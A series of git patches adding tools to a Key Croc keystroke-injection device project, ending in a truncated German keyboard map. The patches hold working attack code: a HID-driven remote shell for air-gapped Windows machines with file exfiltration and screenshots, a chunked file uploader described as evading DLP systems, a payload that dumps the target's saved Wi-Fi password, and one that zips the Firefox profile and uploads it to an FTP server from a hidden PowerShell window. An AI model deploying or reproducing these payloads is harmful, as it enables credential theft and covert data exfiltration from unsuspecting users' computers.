From 0e67acc58c058b4ac02b9a014cc4926ea086b624 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Fri, 12 May 2023 21:55:39 +0200 Subject: [PATCH 01/13] 1st version crocshell --- tools/crocshell_via_storage.py | 90 ++++++++++++++++++++++++++++++++++ 1 file changed, 90 insertions(+) create mode 100644 tools/crocshell_via_storage.py diff --git a/tools/crocshell_via_storage.py b/tools/crocshell_via_storage.py new file mode 100644 index 0000000..d46e5f1 --- /dev/null +++ b/tools/crocshell_via_storage.py @@ -0,0 +1,90 @@ +#!/usr/bin/env python +import os, time, codecs + +def init_ps(): + os.system("rm /root/udisk/out.txt.* > /dev/null 2>&1") + os.system("ATTACKMODE HID STORAGE > /dev/null 2>&1") + time.sleep(3) + + os.system("QUACK GUI r") + time.sleep(2) + + os.system("QUACK STRING powershell.exe") + os.system("QUACK ENTER") + time.sleep(2) + + os.system('QUACK STRING "\$cr0cp4th1387b=Join-Path -Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root -ChildPath \"out.txt\""') + os.system("QUACK ENTER") + time.sleep(1) + + +# SETTING UP THE SHELL +print "Starting the shell ..." +init_ps() + +# SHELL +ctr = 0 +cmd = "" +while True: + cmd = raw_input("CrocSHELL> ").strip() + + if cmd == "exit": + break + + elif cmd[0:5] == "exfil": + cmd = cmd.replace("exfil", "cp") + " (Split-Path $cr0cp4th1387b -Parent)" + + elif cmd == "peek": + cmd = "Start-Sleep -Seconds 2; " + cmd += "Add-Type -AssemblyName System.Windows.Forms; " + cmd += "$screen = [System.Windows.Forms.Screen]::PrimaryScreen.Bounds; " + cmd += "$image = New-Object System.Drawing.Bitmap($screen.Width, $screen.Height); " + cmd += "$graphic = [System.Drawing.Graphics]::FromImage($image); " + cmd += "$point = New-Object System.Drawing.Point(0, 0); " + cmd += "$graphic.CopyFromScreen($point, $point, $image.Size); " + cmd += "$cursorBounds = New-Object System.Drawing.Rectangle([System.Windows.Forms.Cursor]::Position, [System.Windows.Forms.Cursor]::Current.Size); " + cmd += "[System.Windows.Forms.Cursors]::Default.Draw($graphic, $cursorBounds); " + cmd += "$p = Join-Path -Path (Split-Path $cr0cp4th1387b -Parent) -ChildPath screenshot_"+str(ctr+1)+".jpg; " + cmd += "$image.Save(\"$p\", [System.Drawing.Imaging.ImageFormat]::Png); " + + cmd = cmd.replace("$", "\\$").replace('"', '\\\"') + os.system('QUACK STRING "'+cmd+'"') + os.system("QUACK ENTER") + os.system("QUACK GUI DOWN") + time.sleep(5) + os.system("QUACK ALT TAB") + + cmd = "echo \"$p ... saved\" " + + elif cmd == "help": + print "\n AVAILABLE COMMANDS:\n-------------------" + print "exit .... End shell \nexfil ... Exfiltrate file - e.g.: exfil my_secret_passwords.docx \npeek .... Take a screenshot" + print "" + continue + + ctr += 1 + cmd = cmd.replace("$", "\\$").replace('"', '\\\"')+' | Out-File \\\"\$cr0cp4th1387b.'+str(ctr)+'\\\"; echo \\\"%%%DONE%%%\\\" >> \\\"\$cr0cp4th1387b.'+str(ctr)+'\\\"' + + os.system('QUACK STRING "'+cmd+'"') + os.system("QUACK ENTER") + + outp = "" + while not "%%%DONE%%%" in outp: + time.sleep(1) + f = open("/root/udisk/out.txt."+str(ctr), "r") + outp = f.read() + outp = outp.decode("UTF-16") + outp = outp.encode("UTF-8") + f.close() + + end = outp.index("%%%DONE%%%") + outp = outp[0:end].replace("\r", "").strip() + + print outp + + +# CLEANING UP +os.system('QUACK STRING "'+cmd+'"') +os.system("QUACK ENTER") +os.system("ATTACKMODE HID > /dev/null 2>&1") + From fa4639626e3306deefa9eab4ce8098aea98e49ec Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Fri, 12 May 2023 21:56:29 +0200 Subject: [PATCH 02/13] removed senceless import --- tools/crocshell_via_storage.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/crocshell_via_storage.py b/tools/crocshell_via_storage.py index d46e5f1..cf3324e 100644 --- a/tools/crocshell_via_storage.py +++ b/tools/crocshell_via_storage.py @@ -1,5 +1,5 @@ #!/usr/bin/env python -import os, time, codecs +import os, time def init_ps(): os.system("rm /root/udisk/out.txt.* > /dev/null 2>&1") From 90819a74c47129087705333b0a3b549e6e47b158 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Fri, 12 May 2023 22:13:58 +0200 Subject: [PATCH 03/13] Added readme-file --- tools/README.md | 68 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 tools/README.md diff --git a/tools/README.md b/tools/README.md new file mode 100644 index 0000000..6668e0f --- /dev/null +++ b/tools/README.md @@ -0,0 +1,68 @@ +# Key Croc Tools + +### Croc Shell + +Allows the Croc to establish a reverse-shell on air-gapped systems. The Croc will act in `ATTACKMODE HID STORAGE` to collect the output of the commands and loot. + + root@croc:~# python udisk/tools/crocshell_via_storage.py + Starting the shell ... + CrocSHELL> D: + + CrocSHELL> ls + Verzeichnis: D:\ + + + Mode LastWriteTime Length Name + ---- ------------- ------ ---- + d----- 19.01.2023 09:32 000_BreachCompilation + d----- 03.12.2022 22:36 3CX + d----- 26.01.2022 08:09 Blog + d----- 03.04.2022 12:26 Combs_1 + d----- 25.01.2022 15:29 DFL + d----- 26.01.2022 00:30 DFLTask + d----- 10.02.2022 13:39 Honor 8S + d----- 23.10.2016 08:52 plaso-1.5.1 + d----- 26.01.2022 07:53 ZZZ_FONTS + -a---- 04.05.2023 09:57 487556 173.jpg + -a---- 04.05.2023 10:12 206541 173.mp3 + -a---- 04.05.2023 13:44 1415029 173.mp4 + -a---- 25.01.2023 20:11 5050 banner.txt + -a---- 17.02.2022 14:08 1994995712 paladin_edge_64.iso + -a---- 03.07.2022 09:27 1577592 WordRepair.exe + CrocSHELL> L: + + CrocSHELL> ls + Verzeichnis: L:\ + + + Mode LastWriteTime Length Name + ---- ------------- ------ ---- + d----- 14.07.2021 12:14 CDFE + d----- 12.01.2022 16:12 CDFP + d----- 13.08.2020 08:33 DFL Manuals + d----- 20.03.2020 14:01 JPG_Hi_Res + d----- 10.06.2021 18:38 PaWASP + d----- 11.02.2023 13:50 UnFOUNDchk + ------ 21.08.2021 20:06 126205 20210821_200626_FLASH_25010.dat.gz + ------ 20.10.2020 15:35 90539 5c21487e-3812-4498-b66a-eafe679bc4c8.jpg + ------ 01.04.2021 11:16 144368 7a39a04273-9fc4-4e18-b256-9c489b9c6a1c.jpeg + ------ 01.04.2021 11:16 128311 7a61adbd-8e52-4bad-9203-fc842d4069d2.jpeg + ------ 04.11.2020 18:52 627966 hddsuperclone_2.2.18-1_amd64.deb + ------ 27.04.2023 15:33 70553 PawnP1_01.png + ------ 27.04.2023 15:51 19861 Pawnp1_02.png + + CrocSHELL> peek + E:\screenshot_5.jpg ... saved + + CrocSHELL> exfil PawnP1_01.png + + CrocSHELL> help + + AVIALABLE COMMANDS: + -------------------- + exit .... End shell + exfil ... Exfiltrate file - e.g.: exfil my_secret_passwords.docx + peek .... Take a screenshot + + CrocSHELL> exit + root@croc:~# \ No newline at end of file From 42ed9a05071ca519c3c02b735e40509269ff7d81 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sat, 13 May 2023 09:49:55 +0200 Subject: [PATCH 04/13] Added prevent sleep-mode script --- tools/README.md | 21 ++++++++++++++++++++- tools/prevent_sleep.py | 11 +++++++++++ 2 files changed, 31 insertions(+), 1 deletion(-) create mode 100644 tools/prevent_sleep.py diff --git a/tools/README.md b/tools/README.md index 6668e0f..8e6f391 100644 --- a/tools/README.md +++ b/tools/README.md @@ -65,4 +65,23 @@ Allows the Croc to establish a reverse-shell on air-gapped systems. The Croc wil peek .... Take a screenshot CrocSHELL> exit - root@croc:~# \ No newline at end of file + root@croc:~# + +### Prevent the system to go to sleep + +Sends a `SHIFT` keypress each 55 seconds if there is no keyboard activity + + root@croc:~# python udisk/tools/prevent_sleep.py + Sending SHIFT keypress for the 1. time! + Sending SHIFT keypress for the 2. time! + ... + Sending SHIFT keypress for the 897. time! + ^C + root@croc:~# + +You can also run the command in background and log out + + root@croc:~# python udisk/tools/prevent_sleep.py & + [1] 9219 + root@croc:~# + diff --git a/tools/prevent_sleep.py b/tools/prevent_sleep.py new file mode 100644 index 0000000..a4dee07 --- /dev/null +++ b/tools/prevent_sleep.py @@ -0,0 +1,11 @@ +#!/usr/bin/env python +import os, time + +ctr = 0 +while True: + ctr += 1 + os.system("WAIT_FOR_KEYBOARD_INACTIVITY > /dev/null 2>&1") + print "Sending SHIFT keypress for the " + str(ctr) + ". time!" + os.system("QUACK SHIFT") + time.sleep(50) + From 6bb9f2f1841136587ca62ee68b0edc90411d79bf Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sat, 13 May 2023 09:52:04 +0200 Subject: [PATCH 05/13] Adjusted timing --- tools/README.md | 2 +- tools/prevent_sleep.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/README.md b/tools/README.md index 8e6f391..571aa68 100644 --- a/tools/README.md +++ b/tools/README.md @@ -69,7 +69,7 @@ Allows the Croc to establish a reverse-shell on air-gapped systems. The Croc wil ### Prevent the system to go to sleep -Sends a `SHIFT` keypress each 55 seconds if there is no keyboard activity +Sends a `SHIFT` keypress each 50 seconds if there is no keyboard activity root@croc:~# python udisk/tools/prevent_sleep.py Sending SHIFT keypress for the 1. time! diff --git a/tools/prevent_sleep.py b/tools/prevent_sleep.py index a4dee07..6b0d135 100644 --- a/tools/prevent_sleep.py +++ b/tools/prevent_sleep.py @@ -7,5 +7,5 @@ os.system("WAIT_FOR_KEYBOARD_INACTIVITY > /dev/null 2>&1") print "Sending SHIFT keypress for the " + str(ctr) + ". time!" os.system("QUACK SHIFT") - time.sleep(50) + time.sleep(45) From 9160c36d623de031ab7bd78bebd421ffff3274e0 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Sun, 14 May 2023 15:47:20 +0200 Subject: [PATCH 06/13] Added file-uploader script --- tools/README.md | 11 ++++++++ tools/fileupload_via_quack.py | 51 +++++++++++++++++++++++++++++++++++ 2 files changed, 62 insertions(+) create mode 100644 tools/fileupload_via_quack.py diff --git a/tools/README.md b/tools/README.md index 571aa68..bf1f20e 100644 --- a/tools/README.md +++ b/tools/README.md @@ -85,3 +85,14 @@ You can also run the command in background and log out [1] 9219 root@croc:~# +### Upload files without network or storage interactions + +This allow you to upload a file without triggering many DLP systems + + root@croc:~/udisk/tools# python fileupload_via_quack.py bob.exe "D:\Z1.exe" + OPENING powershell.exe + SENDING CHUNK 1 / 481 ... DONE + SENDING CHUNK 2 / 481 ... DONE + ... + SENDING CHUNK 481 / 481 ... DONE + DONE IN 1727.92612386 SEC. \ No newline at end of file diff --git a/tools/fileupload_via_quack.py b/tools/fileupload_via_quack.py new file mode 100644 index 0000000..53adf32 --- /dev/null +++ b/tools/fileupload_via_quack.py @@ -0,0 +1,51 @@ +#!/usr/bin/env python +import base64 +import time +import sys +import os + +chunk_size = 1500 +start = time.time() + +def usage(): + print "\nUSAGE:\n------\n{os.path.basename(__file__)} [LOCAL FILEPATH] [REMOTE FILEPATH]\n" + quit() + +# CHECK CMD-LINE ARGS +if len(sys.argv) != 3: + usage() +else: + file = sys.argv[1] + remote = sys.argv[2].replace("\\", "\\\\") + +with open(file, "rb") as f: + data = f.read() + b64 = base64.b64encode(data).decode("UTF-8") + +# Split into Base64 encoded string into chunks +chunks = [b64[i:i+chunk_size] for i in range(0, len(b64), chunk_size)] + +# Open powershell +print "OPENING powershell.exe" +os.system("QUACK GUI r") +time.sleep(1.5) +os.system("QUACK STRING powershell.exe") +os.system("QUACK ENTER") +time.sleep(1.5) + +# Run upload +os.system('QUACK STRING \$b=\\"\\"') +os.system('QUACK ENTER') + +max = len(chunks) +ctr = 0 +for chunk in chunks: + ctr += 1 + os.system('QUACK STRING \$b+=\\"'+chunk+'\\"') + os.system('QUACK ENTER') + print "SENDING CHUNK "+str(ctr)+" / "+str(max)+" ... DONE" + +# Write file on victim-system +os.system('QUACK STRING [IO.File]::WriteAllBytes\(\\"'+remote+'\\", [Convert]::FromBase64String\(\$b\)\)\\; exit\\;') +os.system('QUACK ENTER') +print "DONE IN "+str(time.time() - start)+" SEC." From eba1ed321ac088f2201e5f5a0a4796b16be7d2ca Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Mon, 15 May 2023 09:17:02 +0200 Subject: [PATCH 07/13] Added autoconfig payload --- .../WLAN_autoconfig/autoconfig_croc.txt | 53 +++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt diff --git a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt new file mode 100644 index 0000000..5a8db61 --- /dev/null +++ b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt @@ -0,0 +1,53 @@ +# Title: Croc_Autoconfig +# Description: Exfiltrate keyboard-layout and WIFI configuration from target +# and set config.txt accordingly +# Author: MarkB +# Version: 1.0 +# Category: Key Croc + +# Config parameters +name_line=11 +pass_line=33 + +# ATTACK SCRIPT +ATTACKMODE STORAGE HID +Q DELAY 8000 +LED ATTACK +Q GUI r +Q DELAY 1500 +Q STRING powershell.exe +Q ENTER +Q DELAY 1500 + +# Get actual WIFI configuration +Q STRING "netsh wlan show profile name=(Get-NetConnectionProfile).Name[0] key=clear | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"WLAN.txt\")" +Q ENTER +Q DELAY 3000 + +# Get keyboard layout +Q STRING "(Get-Culture).Name | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"KEYBOARD.txt\")" +Q ENTER +Q DELAY 1000 + +# Close powershell +Q STRING exit +Q ENTER + + +# Parse Data and create config.txt +ATTACKMODE HID +LED Y +name=`head -$name_line WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` +pass=`head -$pass_line WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` +lang=`cat KEYBOARD.txt | cut -d "-" -f 2` + +echo "DUCKY_LANG $lang" > /root/udisk/config.txt +echo "WIFI_SSID $name" >> /root/udisk/config.txt +echo "WIFI_PASS $pass" >> /root/udisk/config.txt +echo "SSH ENABLE" >> /root/udisk/config.txt + +# Deactivate payload, cleanup and reboot +mv /root/udisk/payloads/autoconfig_croc.txt /root/udisk/library/examples/ +rm /root/udiks/WLAN.txt +rm /root/udisk/KEYBOARD.txt +LED G \ No newline at end of file From 7c1260aef52a2119ef45030f6067846aeb06ca22 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Mon, 15 May 2023 09:53:28 +0200 Subject: [PATCH 08/13] working version --- .../WLAN_autoconfig/autoconfig_croc.txt | 38 +++++++++---------- 1 file changed, 19 insertions(+), 19 deletions(-) diff --git a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt index 5a8db61..0e2ad25 100644 --- a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt +++ b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt @@ -11,35 +11,35 @@ pass_line=33 # ATTACK SCRIPT ATTACKMODE STORAGE HID -Q DELAY 8000 +sleep 5 LED ATTACK -Q GUI r -Q DELAY 1500 -Q STRING powershell.exe -Q ENTER -Q DELAY 1500 +QUACK GUI r +sleep 2 +QUACK STRING powershell.exe +QUACK ENTER +sleep 2 # Get actual WIFI configuration -Q STRING "netsh wlan show profile name=(Get-NetConnectionProfile).Name[0] key=clear | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"WLAN.txt\")" -Q ENTER -Q DELAY 3000 +QUACK STRING "netsh wlan show profile name=(Get-NetConnectionProfile).Name[0] key=clear | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"WLAN.txt\")" +QUACK ENTER +sleep 5 # Get keyboard layout -Q STRING "(Get-Culture).Name | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"KEYBOARD.txt\")" -Q ENTER -Q DELAY 1000 +QUACK STRING "(Get-Culture).Name | Set-Content -Path (Join-Path (Get-PSDrive -Name (Get-Volume -FileSystemLabel KeyCroc).DriveLetter).Root \"KEYBOARD.txt\")" +QUACK ENTER +sleep 2 # Close powershell -Q STRING exit -Q ENTER +QUACK STRING exit +QUACK ENTER # Parse Data and create config.txt -ATTACKMODE HID +#ATTACKMODE HID LED Y -name=`head -$name_line WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` -pass=`head -$pass_line WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` -lang=`cat KEYBOARD.txt | cut -d "-" -f 2` +name=`head -$name_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` +pass=`head -$pass_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` +lang=`cat /root/udisk/KEYBOARD.txt | cut -d "-" -f 2` echo "DUCKY_LANG $lang" > /root/udisk/config.txt echo "WIFI_SSID $name" >> /root/udisk/config.txt @@ -48,6 +48,6 @@ echo "SSH ENABLE" >> /root/udisk/config.txt # Deactivate payload, cleanup and reboot mv /root/udisk/payloads/autoconfig_croc.txt /root/udisk/library/examples/ -rm /root/udiks/WLAN.txt +rm /root/udisk/WLAN.txt rm /root/udisk/KEYBOARD.txt LED G \ No newline at end of file From f5a1427deae70685e0a3ed43d59705dadb6786d7 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Mon, 15 May 2023 12:23:18 +0200 Subject: [PATCH 09/13] All woring just not the reboot --- .../credentials/WLAN_autoconfig/README.md | 1 + .../WLAN_autoconfig/autoconfig_croc.txt | 28 +++++++++++-------- .../credentials/WLAN_autoconfig/dummy.txt | 2 ++ 3 files changed, 20 insertions(+), 11 deletions(-) create mode 100644 payloads/library/credentials/WLAN_autoconfig/README.md create mode 100644 payloads/library/credentials/WLAN_autoconfig/dummy.txt diff --git a/payloads/library/credentials/WLAN_autoconfig/README.md b/payloads/library/credentials/WLAN_autoconfig/README.md new file mode 100644 index 0000000..ef94a7b --- /dev/null +++ b/payloads/library/credentials/WLAN_autoconfig/README.md @@ -0,0 +1 @@ +# Autoconfiguration payload diff --git a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt index 0e2ad25..a5d7f4e 100644 --- a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt +++ b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt @@ -10,7 +10,8 @@ name_line=11 pass_line=33 # ATTACK SCRIPT -ATTACKMODE STORAGE HID +sleep 10 +ATTACKMODE HID STORAGE sleep 5 LED ATTACK QUACK GUI r @@ -35,19 +36,24 @@ QUACK ENTER # Parse Data and create config.txt -#ATTACKMODE HID LED Y -name=`head -$name_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` -pass=`head -$pass_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g'` -lang=`cat /root/udisk/KEYBOARD.txt | cut -d "-" -f 2` - -echo "DUCKY_LANG $lang" > /root/udisk/config.txt -echo "WIFI_SSID $name" >> /root/udisk/config.txt -echo "WIFI_PASS $pass" >> /root/udisk/config.txt -echo "SSH ENABLE" >> /root/udisk/config.txt +ATTACKMODE HID +sleep 2 +name=$(head -$name_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g') +pass=$(head -$pass_line /root/udisk/WLAN.txt | tail -1 | cut -d ":" -f 2 | sed 's/^\s*\|\s*$//g') +lang=$(cat /root/udisk/KEYBOARD.txt | cut -d "-" -f 2) + +if [ ! -z "$lang" ] +then + echo "DUCKY_LANG $lang" > /root/udisk/config.txt + echo "WIFI_SSID $name" >> /root/udisk/config.txt + echo "WIFI_PASS $pass" >> /root/udisk/config.txt + echo "SSH ENABLE" >> /root/udisk/config.txt +fi # Deactivate payload, cleanup and reboot mv /root/udisk/payloads/autoconfig_croc.txt /root/udisk/library/examples/ rm /root/udisk/WLAN.txt rm /root/udisk/KEYBOARD.txt -LED G \ No newline at end of file +LED G FAST +shutdown -r now \ No newline at end of file diff --git a/payloads/library/credentials/WLAN_autoconfig/dummy.txt b/payloads/library/credentials/WLAN_autoconfig/dummy.txt new file mode 100644 index 0000000..91c29e4 --- /dev/null +++ b/payloads/library/credentials/WLAN_autoconfig/dummy.txt @@ -0,0 +1,2 @@ +# DUMMY-file needed to be in payloads-folder with version 1.3 that the payload execute propperly +# maybe not needed with newer versions! \ No newline at end of file From 95d0da7a71ab6b3e2156a15314d01d63ec4dd5e2 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Tue, 16 May 2023 00:09:57 +0200 Subject: [PATCH 10/13] Exfiltrate Firefox Profile Payload --- .../credentials/WLAN_autoconfig/README.md | 14 +++++ .../WLAN_autoconfig/autoconfig_croc.txt | 4 +- .../Exfiltrate_Firefox_Profile.txt | 51 +++++++++++++++++++ .../Exfiltrate_Firefox_Profile/README.md | 7 +++ .../Exfiltrate_Firefox_Profile/dummy.txt | 2 + 5 files changed, 76 insertions(+), 2 deletions(-) create mode 100644 payloads/library/exfiltration/Exfiltrate_Firefox_Profile/Exfiltrate_Firefox_Profile.txt create mode 100644 payloads/library/exfiltration/Exfiltrate_Firefox_Profile/README.md create mode 100644 payloads/library/exfiltration/Exfiltrate_Firefox_Profile/dummy.txt diff --git a/payloads/library/credentials/WLAN_autoconfig/README.md b/payloads/library/credentials/WLAN_autoconfig/README.md index ef94a7b..9939be9 100644 --- a/payloads/library/credentials/WLAN_autoconfig/README.md +++ b/payloads/library/credentials/WLAN_autoconfig/README.md @@ -1 +1,15 @@ # Autoconfiguration payload + +Starts in `ATTACKMODE HID STORAGE` and extracts with powershell commands SSID, password and keyboard-layout from the target system. + +Then the payload alters the `config.txt` and removes itself from the payloads directtory! **Attention:** the directory `/root/udisk/library/examples/` nust exist that the payload can move itself! + +The croc should automatically reboot but this don't work actually - so unplug and replug the croc when the LED start flashing green. + +In case another language-version of Windows will have SSID and password in other lines alter this 2 lines accordingly: + + # Config parameters + name_line=11 # Line-number which contains the SSID + pass_line=33 # Line-number which contains the password + +Happy hacking ;-) diff --git a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt index a5d7f4e..c7b418d 100644 --- a/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt +++ b/payloads/library/credentials/WLAN_autoconfig/autoconfig_croc.txt @@ -6,8 +6,8 @@ # Category: Key Croc # Config parameters -name_line=11 -pass_line=33 +name_line=11 # Line-number which contains the SSID +pass_line=33 # Line-number which contains the password # ATTACK SCRIPT sleep 10 diff --git a/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/Exfiltrate_Firefox_Profile.txt b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/Exfiltrate_Firefox_Profile.txt new file mode 100644 index 0000000..f3eb52e --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/Exfiltrate_Firefox_Profile.txt @@ -0,0 +1,51 @@ +# Title: Exfiltrate_Firefox_Profile +# Description: Exfiltrate Firefox Profile folder via +# FTP server +# Author: MarkB +# Version: 1.0 +# Category: Key Croc + +# Config parameters +serveradr="111.222.33.44" # Server IP or domain +username="ftpuser" # FTP username +password="secretpasswd" # FTP password + +# WRITE SRCIPT +sleep 10 +LED M +ATTACKMODE HID +QUACK GUI r +sleep 1 +QUACK STRING "notepad.exe" +QUACK ENTER +sleep 2 +QUACK STRING "Compress-Archive -Path \"\$(\$env:LOCALAPPDATA)\\Mozilla\\Firefox\\Profiles\\\" -CompressionLevel \"Fastest\" -DestinationPath \"\$(\$env:TEMP)\\ff.zip\"" +QUACK ENTER +QUACK STRING "\$client = New-Object System.Net.WebClient" +QUACK ENTER +QUACK STRING "\$client.Credentials = New-Object System.Net.NetworkCredential(\"$username\", \"$password\")" +QUACK ENTER +QUACK STRING "\$client.UploadFile(\"ftp://$serveradr/ff.zip\", \"\$(\$env:TEMP)\\ff.zip\")" +QUACK ENTER +QUACK STRING "rm \"\$(\$env:TEMP)\\ff.zip\"" +QUACK ENTER +QUACK STRING "rm \"\$(\$env:TEMP)\\e.ps1\"" +QUACK ENTER +QUACK CTRL s +sleep 1 +QUACK STRING "%TEMP%\\e.ps1" +QUACK TAB +QUACK DOWN +QUACK DOWN +QUACK ENTER +QUACK ENTER +sleep 1 +QUACK ALT F4 +sleep 1 + +# EXECUTE SCRIPT IN HIDDEN WINDOW +QUACK GUI r +sleep 1 +QUACK STRING "powershell.exe -windowstyle Hidden %TEMP%\\e.ps1" +QUACK ENTER +LED OFF \ No newline at end of file diff --git a/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/README.md b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/README.md new file mode 100644 index 0000000..e1f22bf --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/README.md @@ -0,0 +1,7 @@ +# Firefox profile folder upload + +Creates a powershell-script which compresses and uploads the Firefox profile-folder to a FTP-server. + +That secript get then executed in a hidden powershell window because this process may take some time... + +For Google Chrome you can use `$($env:LOCALAPPDATA)\Google\Chrome\User Data\Default` instead. diff --git a/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/dummy.txt b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/dummy.txt new file mode 100644 index 0000000..91c29e4 --- /dev/null +++ b/payloads/library/exfiltration/Exfiltrate_Firefox_Profile/dummy.txt @@ -0,0 +1,2 @@ +# DUMMY-file needed to be in payloads-folder with version 1.3 that the payload execute propperly +# maybe not needed with newer versions! \ No newline at end of file From d0fc9ff51fc305292f5303d5ca56bb944f852ef1 Mon Sep 17 00:00:00 2001 From: mark-b1980 Date: Fri, 19 May 2023 23:05:19 +0200 Subject: [PATCH 11/13] Fixed missing CRTL+ALT+DEL, ALTGR and others --- languages/de.json | 217 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 217 insertions(+) create mode 100644 languages/de.json diff --git a/languages/de.json b/languages/de.json new file mode 100644 index 0000000..796af87 --- /dev/null +++ b/languages/de.json @@ -0,0 +1,217 @@ +{ + "__comment":"All numbers here are in hex format and 0x is ignored.", + "__comment":" ", + "__comment":"This list is in ascending order of 3rd byte (HID Usage ID).", + "__comment":" See section 10 Keyboard/Keypad Page (0x07)", + "__comment":" of document USB HID Usage Tables Version 1.12.", + "__comment":" ", + "__comment":"Definition of these 3 bytes can be found", + "__comment":" in section B.1 Protocol 1 (Keyboard)", + "__comment":" of document Device Class Definition for HID Version 1.11", + "__comment":" - byte 1: Modifier keys", + "__comment":" - byte 2: Reserved", + "__comment":" - byte 3: Keycode 1", + "__comment":" ", + "__comment":"Both documents can be obtained from link here", + "__comment":" http://www.usb.org/developers/hidpage/", + "__comment":" ", + "__comment":"A = LeftShift + a, { = LeftShift + [", + "__comment":" ", + "__comment":"German umlauts added by Simon Dankelmann", + "a":"00,00,04", + "b":"00,00,05", + "c":"00,00,06", + "d":"00,00,07", + "e":"00,00,08", + "f":"00,00,09", + "g":"00,00,0a", + "h":"00,00,0b", + "i":"00,00,0c", + "j":"00,00,0d", + "k":"00,00,0e", + "l":"00,00,0f", + "m":"00,00,10", + "n":"00,00,11", + "o":"00,00,12", + "p":"00,00,13", + "q":"00,00,14", + "r":"00,00,15", + "s":"00,00,16", + "t":"00,00,17", + "u":"00,00,18", + "v":"00,00,19", + "w":"00,00,1a", + "x":"00,00,1b", + "z":"00,00,1c", + "y":"00,00,1d", + "1":"00,00,1e", + "2":"00,00,1f", + "3":"00,00,20", + "4":"00,00,21", + "5":"00,00,22", + "6":"00,00,23", + "7":"00,00,24", + "8":"00,00,25", + "9":"00,00,26", + "0":"00,00,27", + "ENTER":"00,00,28", + "ESC":"00,00,29", + "ESCAPE":"00,00,29", + "TAB":"00,00,2b", + " ":"00,00,2c", + "SPACE":"00,00,2c", + "+":"00,00,30", + "#":"00,00,31", + "^":"00,00,35", + ",":"00,00,36", + ".":"00,00,37", + "-":"00,00,38", + "CAPSLOCK":"00,00,39", + "F1":"00,00,3a", + "F2":"00,00,3b", + "F3":"00,00,3c", + "F4":"00,00,3d", + "F5":"00,00,3e", + "F6":"00,00,3f", + "F7":"00,00,40", + "F8":"00,00,41", + "F9":"00,00,42", + "F10":"00,00,43", + "F11":"00,00,44", + "F12":"00,00,45", + "PRINTSCREEN":"00,00,46", + "SCROLLLOCK":"00,00,47", + "BREAK":"00,00,48", + "PAUSE":"00,00,48", + "INSERT":"00,00,49", + "HOME":"00,00,4a", + "PAGEUP":"00,00,4b", + "DEL":"00,00,4c", + "DELETE":"00,00,4c", + "END":"00,00,4d", + "PAGEDOWN":"00,00,4e", + "RIGHT":"00,00,4f", + "RIGHTARROW":"00,00,4f", + "LEFT":"00,00,50", + "LEFTARROW":"00,00,50", + "DOWN":"00,00,51", + "DOWNARROW":"00,00,51", + "UP":"00,00,52", + "UPARROW":"00,00,52", + "<":"00,00,64", + "APP":"00,00,65", + "MENU":"00,00,65", + 